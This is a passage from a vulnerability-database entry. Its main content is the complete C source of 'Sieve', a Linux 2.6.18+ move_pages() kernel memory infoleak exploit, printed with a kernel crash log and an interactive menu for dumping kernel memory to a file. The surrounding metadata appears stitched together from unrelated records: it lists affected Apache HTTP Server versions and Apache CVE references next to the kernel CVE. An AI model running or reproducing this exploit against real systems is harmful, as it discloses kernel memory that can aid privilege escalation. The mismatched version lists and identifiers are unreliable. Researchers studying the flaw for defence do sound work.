vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.31 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.30 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.29 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.28 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.27 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.26 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.25 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.24 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.23 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.22 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.20 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.19 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.18 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.17 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.16 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.15 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache mac | scope: | eq | version: | 1.3.14 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.14 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.13 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.12 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.11 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.10 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.9 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.8 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache -dev | scope: | eq | version: | 1.3.7 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.7 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.6 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.5 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.4 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.3 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.2 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.1 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache 2.3.38-dev | scope: | - | version: | - | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.3.3 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache 2.2.7-dev | scope: | - | version: | - | Trust: 0.3 |
vendor: | apache | model: | software foundation apache 2.2.6-dev | scope: | - | version: | - | Trust: 0.3 |
vendor: | apache | model: | software foundation apache 2.2.5-dev | scope: | - | version: | - | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.21 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.20 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.19 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.18 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.17 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.16 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache 2.2.15-dev | scope: | - | version: | - | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.1 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache 2.0.64-dev | scope: | - | version: | - | Trust: 0.3 |
vendor: | apache | model: | software foundation apache 2.0.62-dev | scope: | - | version: | - | Trust: 0.3 |
vendor: | apache | model: | software foundation apache 2.0.61-dev | scope: | - | version: | - | Trust: 0.3 |
vendor: | apache | model: | software foundation apache 2.0.60-dev | scope: | - | version: | - | Trust: 0.3 |
vendor: | apache | model: | software foundation apache 1.3.40-dev | scope: | - | version: | - | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.35 | Trust: 0.3 |
vendor: | ibm | model: | http server | scope: | ne | version: | 7.0.0.21 | Trust: 0.3 |
vendor: | hp | model: | system management homepage | scope: | ne | version: | 7.0 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | ne | version: | 2.2.22 | Trust: 0.3 |
EXPLOIT
/* sieve (because the Linux kernel leaks like one, get it?)
Bug NOT discovered by Marcus Meissner of SuSE security
This bug was discovered by Ramon de Carvalho Valle in September of 2009
The bug was found via fuzzing, and on Sept 24th I was sent a POC DoS
for the bug (but had forgotten about it until now)
Ramon's report was sent to Novell's internal bugzilla, upon which
some months later Marcus took credit for discovering someone else's bug
Maybe he thought he could get away with it ;) Almost ;)
greets to pipacs, tavis (reciprocal greets!), cloudburst, and rcvalle!
first exploit of 2010, next one will be for a bugclass that has
afaik never been exploited on Linux before
note that this bug can also cause a DoS like so:
Unable to handle kernel paging request at ffffffff833c3be8 RIP:
[<ffffffff800dc8ac>] new_page_node+0x31/0x48
PGD 203067 PUD 205063 PMD 0
Oops: 0000 [1] SMP
Pid: 19994, comm: exploit Not tainted 2.6.18-164.el5 #1
RIP: 0010:[<ffffffff800dc8ac>] [<ffffffff800dc8ac>]
new_page_node+0x31/0x48
RSP: 0018:ffff8100a3c6de50 EFLAGS: 00010246
RAX: 00000000005fae0d RBX: ffff8100028977a0 RCX: 0000000000000013
RDX: ffff8100a3c6dec0 RSI: 0000000000000000 RDI: 00000000000200d2
RBP: 0000000000000000 R08: 0000000000000004 R09: 000000000000003c
R10: 0000000000000000 R11: 0000000000000092 R12: ffffc20000077018
R13: ffffc20000077000 R14: ffff8100a3c6df00 R15: ffff8100a3c6df28
FS: 00002b8481125810(0000) GS:ffffffff803c0000(0000)
knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b
CR2: ffffffff833c3be8 CR3: 000000009562d000 CR4: 00000000000006e0
Process exploit (pid: 19994, threadinfo ffff8100a3c6c000, task
ffff81009d8c4080)
Stack: ffffffff800dd008 ffffc20000077000 ffffffff800dc87b
0000000000000000
0000000000000000 0000000000000003 ffff810092c23800 0000000000000003
00000000000000ff ffff810092c23800 00007eff6d3dc7ff 0000000000000000
Call Trace:
[<ffffffff800dd008>] migrate_pages+0x8d/0x42b
[<ffffffff800dc87b>] new_page_node+0x0/0x48
[<ffffffff8009cee2>] schedule_on_each_cpu+0xda/0xe8
[<ffffffff800dd8a2>] sys_move_pages+0x339/0x43d
[<ffffffff8005d28d>] tracesys+0xd5/0xe0
Code: 48 8b 14 c5 80 cb 3e 80 48 81 c2 10 3c 00 00 e9 82 29 f3 ff
RIP [<ffffffff800dc8ac>] new_page_node+0x31/0x48
RSP <ffff8100a3c6de50>
CR2: ffffffff833c3be8
*/
#include <stdio.h>
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/syscall.h>
#include <errno.h>
#include "exp_framework.h"
#undef MPOL_MF_MOVE
#define MPOL_MF_MOVE (1 << 1)
int max_numnodes;
unsigned long node_online_map;
unsigned long node_states;
unsigned long our_base;
unsigned long totalhigh_pages;
#undef __NR_move_pages
#ifdef __x86_64__
#define __NR_move_pages 279
#else
#define __NR_move_pages 317
#endif
/* random notes I took when writing this (all applying to the 64bit case):
checking in a bitmap based on node_states[2] or node_states[3]
(former if HIGHMEM is not present, latter if it is)
each node_state is of type nodemask_t, which is is a bitmap of size
MAX_NUMNODES/8
RHEL 5.4 has MAX_NUMNODES set to 64, which makes this 8 bytes in size
so the effective base we're working with is either node_states + 16 or
node_states + 24
on 2.6.18 it's based off node_online_map
node_isset does a test_bit based on this base
so our specfic case does: base[ourval / 8] & (1 << (ourval & 7))
all the calculations appear to be signed, so we can both index in the
negative and positive direction, based on ourval
on 64bit, this gives us a 256MB range above and below our base to grab
memory of
(by passing in a single page and a single node for each bit we want to
leak the value of, we can reconstruct entire bytes)
we can determine MAX_NUMNODES by looking up two adjacent numa bitmaps,
subtracting their difference, and multiplying by 8
but we don't need to do this
*/
struct exploit_state *exp_state;
char *desc = "Sieve: Linux 2.6.18+ move_pages() infoleak";
int get_exploit_state_ptr(struct exploit_state *ptr)
{
exp_state = ptr;
return 0;
}
int requires_null_page = 0;
void addr_to_nodes(unsigned long addr, int *nodes)
{
int i;
int min = 0x80000000 / 8;
int max = 0x7fffffff / 8;
if ((addr < (our_base - min)) ||
(addr > (our_base + max))) {
fprintf(stdout, "Error: Unable to dump address %p\n", addr);
exit(1);
}
for (i = 0; i < 8; i++) {
nodes[i] = ((int)(addr - our_base) << 3) | i;
}
return;
}
char *buf;
unsigned char get_byte_at_addr(unsigned long addr)
{
int nodes[8];
int node;
int status;
int i;
int ret;
unsigned char tmp = 0;
addr_to_nodes(addr, (int *)&nodes);
for (i = 0; i < 8; i++) {
node = nodes[i];
ret = syscall(__NR_move_pages, 0, 1, &buf, &node, &status, MPOL_MF_MOVE);
if (errno == ENOSYS) {
fprintf(stdout, "Error: move_pages is not supported on this kernel.\n");
exit(1);
} else if (errno != ENODEV)
tmp |= (1 << i);
}
return tmp;
}
void menu(void)
{
fprintf(stdout, "Enter your choice:\n"
" [0] Dump via symbol/address with length\n"
" [1] Dump entire range to file\n"
" [2] Quit\n");
}
int trigger(void)
{
unsigned long addr;
unsigned long addr2;
unsigned char thebyte;
unsigned char choice = 0;
char ibuf[1024];
char *p;
FILE *f;
// get lingering \n
getchar();
while (choice != '2') {
menu();
fgets((char *)&ibuf, sizeof(ibuf)-1, stdin);
choice = ibuf[0];
switch (choice) {
case '0':
fprintf(stdout, "Enter the symbol or address for the base:\n");
fgets((char *)&ibuf, sizeof(ibuf)-1, stdin);
p = strrchr((char *)&ibuf, '\n');
if (p)
*p = '\0';
addr = exp_state->get_kernel_sym(ibuf);
if (addr == 0) {
addr = strtoul(ibuf, NULL, 16);
}
if (addr == 0) {
fprintf(stdout, "Invalid symbol or address.\n");
break;
}
addr2 = 0;
while (addr2 == 0) {
fprintf(stdout, "Enter the length of bytes to read in hex:\n");
fscanf(stdin, "%x", &addr2);
// get lingering \n
getchar();
}
addr2 += addr;
fprintf(stdout, "Leaked bytes:\n");
while (addr < addr2) {
thebyte = get_byte_at_addr(addr);
printf("%02x ", thebyte);
addr++;
}
printf("\n");
break;
case '1':
addr = our_base - 0x10000000;
#ifdef __x86_64__
/*
our lower bound will cause us to access
bad addresses and cause an oops
*/
if (addr < 0xffffffff80000000)
addr = 0xffffffff80000000;
#else
if (addr < 0x80000000)
addr = 0x80000000;
else if (addr < 0xc0000000)
addr = 0xc0000000;
#endif
addr2 = our_base + 0x10000000;
f = fopen("./kernel.bin", "w");
if (f == NULL) {
fprintf(stdout, "Error: unable to open ./kernel.bin for writing\n");
exit(1);
}
fprintf(stdout, "Dumping to kernel.bin (this will take a while): ");
fflush(stdout);
while (addr < addr2) {
thebyte = get_byte_at_addr(addr);
fputc(thebyte, f);
if (!(addr % (128 * 1024))) {
fprintf(stdout, ".");
fflush(stdout);
}
addr++;
}
fprintf(stdout, "done.\n");
fclose(f);
break;
case '2':
break;
}
}
return 0;
}
int prepare(unsigned char *ptr)
{
int node;
int found_gap = 0;
int i;
int ret;
int status;
totalhigh_pages = exp_state->get_kernel_sym("totalhigh_pages");
node_states = exp_state->get_kernel_sym("node_states");
node_online_map = exp_state->get_kernel_sym("node_online_map");
buf = malloc(4096);
/* cheap hack, won't work on actual NUMA systems -- for those we could use the alternative noted
towards the beginning of the file, here we're just working until we leak the first bit of the adjacent table,
which will be set for our single node -- this gives us the size of the bitmap
*/
for (i = 0; i < 512; i++) {
node = i;
ret = syscall(__NR_move_pages, 0, 1, &buf, &node, &status, MPOL_MF_MOVE);
if (errno == ENOSYS) {
fprintf(stdout, "Error: move_pages is not supported on this kernel.\n");
exit(1);
} else if (errno == ENODEV) {
found_gap = 1;
} else if (found_gap == 1) {
max_numnodes = i;
fprintf(stdout, " [+] Detected MAX_NUMNODES as %d\n", max_numnodes);
break;
}
}
if (node_online_map != 0)
our_base = node_online_map;
/* our base for this depends on the existence of HIGHMEM and the value of MAX_NUMNODES, since it determines the size
of each bitmap in the array our base is in the middle of
we've taken account for all this
*/
else if (node_states != 0)
our_base = node_states + (totalhigh_pages ? (3 * (max_numnodes / 8)) : (2 * (max_numnodes / 8)));
else {
fprintf(stdout, "Error: kernel doesn't appear vulnerable.\n");
exit(1);
}
return 0;
}
int post(void)
{
return 0;
}
Trust: 1.0
EXPLOIT LANGUAGE
c
Trust: 1.0
PRICE
free
Trust: 1.0
TYPE
'move_pages()' Information Leak
Trust: 1.0
TAGS
tag: | exploit | Trust: 0.5 |
tag: | remote | Trust: 0.5 |
tag: | protocol | Trust: 0.5 |
tag: | proof of concept | Trust: 0.5 |
tag: | info disclosure | Trust: 0.5 |
CREDITS
spender
Trust: 1.0
EXTERNAL IDS
db: | NVD | id: | CVE-2010-0415 | Trust: 1.0 |
db: | EXPLOIT-DB | id: | 40810 | Trust: 1.0 |
db: | NVD | id: | CVE-2012-0053 | Trust: 0.8 |
db: | JUNIPER | id: | JSA10642 | Trust: 0.6 |
db: | JUNIPER | id: | JSA10585 | Trust: 0.6 |
db: | PACKETSTORM | id: | 109284 | Trust: 0.5 |
db: | HITACHI | id: | HS12-033 | Trust: 0.3 |
db: | BID | id: | 51706 | Trust: 0.3 |
db: | JUNIPER | id: | JSA10658 | Trust: 0.3 |
db: | NVD | id: | CVE-2011-3368 | Trust: 0.3 |
db: | BID | id: | 49957 | Trust: 0.3 |
REFERENCES
url: | https://grsecurity.net/~spender/exploits/exp_sieve.txt | Trust: 1.0 |
url: | https://nvd.nist.gov/vuln/detail/cve-2010-0415 | Trust: 1.0 |
url: | http://support.avaya.com/css/p8/documents/100158872 | Trust: 0.6 |
url: | http://h20565.www2.hp.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_na-c03231301&ac.admitted=1332965374461.876444892.492883150 | Trust: 0.6 |
url: | http://httpd.apache.org/ | Trust: 0.6 |
url: | http://kb.juniper.net/infocenter/index?page=content&id=jsa10642&cat=sirt_1&actp=list | Trust: 0.6 |
url: | http://kb.juniper.net/infocenter/index?page=content&id=jsa10585 | Trust: 0.6 |
url: | https://nvd.nist.gov/vuln/detail/cve-2012-0053 | Trust: 0.5 |
url: | http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004302 | Trust: 0.3 |
url: | https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c03691745 | Trust: 0.3 |
url: | http://httpd.apache.org/security/vulnerabilities_20.html | Trust: 0.3 |
url: | http://www.sophos.com/en-us/support/knowledgebase/119773.aspx | Trust: 0.3 |
url: | http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15273.html | Trust: 0.3 |
url: | http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c03315912 | Trust: 0.3 |
url: | http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c03360041 | Trust: 0.3 |
url: | http://mail-archives.apache.org/mod_mbox/httpd-announce/201307.mbox/%3c20130710124920.2b8793ed.wrowe%40rowe-clan.net%3e | Trust: 0.3 |
url: | http://www.coresecurity.com/advisories/sophos-web-protection-appliance-multiple-vulnerabilities | Trust: 0.3 |
url: | https://h20565.www2.hp.com/portal/site/hpsc/template.page/public/kb/docdisplay/?javax.portlet.tpst=ba847bafb2a2d782fcbb0710b053ce01&javax.portlet.prp_ba847bafb2a2d782fcbb0710b053ce01=wsrp-navigational | Trust: 0.3 |
url: | http://www.fujitsu.com/global/support/software/security/products-f/interstage-201203e.html | Trust: 0.3 |
url: | http://www.xerox.com/download/security/security-bulletin/16aeb-4cd3628b94080/cert_xrx12-009_v1.1.pdf | Trust: 0.3 |
url: | http://httpd.apache.org/security/vulnerabilities_22.html | Trust: 0.3 |
url: | http://www.hitachi.co.jp/prod/comp/soft1/security/info/vuls/hs12-033/index.html | Trust: 0.3 |
url: | http://support.avaya.com/css/p8/documents/100157326 | Trust: 0.3 |
url: | http://www.fujitsu.com/global/support/software/security/products-f/interstage-201104e.html | Trust: 0.3 |
url: | http://support.avaya.com/css/p8/documents/100151220 | Trust: 0.3 |
url: | http://kb.juniper.net/infocenter/index?page=content&id=jsa10658&cat=sirt_1&actp=list | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=nas2b7c57b1f1035675186257927003c8d48 | Trust: 0.3 |
url: | http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html | Trust: 0.3 |
url: | http://seclists.org/fulldisclosure/2011/oct/232 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg1pm48384 | Trust: 0.3 |
url: | https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c03517954&ac.admitted=1349807398574.876444892.199480143 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg27014506 | Trust: 0.3 |
url: | http://www.oracle.com/technetwork/topics/security/cpujul2012-392727.html | Trust: 0.3 |
url: | http://www.xerox.com/download/security/security-bulletin/12047-4e4eed8d42ca6/cert_xrx13-007_v1.0.pdf | Trust: 0.3 |
url: | http://support.avaya.com/css/p8/documents/100152144 | Trust: 0.3 |
SOURCES
db: | BID | id: | 51706 |
db: | BID | id: | 49957 |
db: | PACKETSTORM | id: | 109284 |
db: | EXPLOIT-DB | id: | 40810 |
LAST UPDATE DATE
2023-05-30T11:42:41.331000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 51706 | date: | 2015-04-13T21:30:00 |
db: | BID | id: | 49957 | date: | 2015-05-07T17:07:00 |
SOURCES RELEASE DATE
db: | BID | id: | 51706 | date: | 2012-01-23T00:00:00 |
db: | BID | id: | 49957 | date: | 2011-10-05T00:00:00 |
db: | PACKETSTORM | id: | 109284 | date: | 2012-01-31T11:11:11 |
db: | EXPLOIT-DB | id: | 40810 | date: | 2010-02-08T00:00:00 |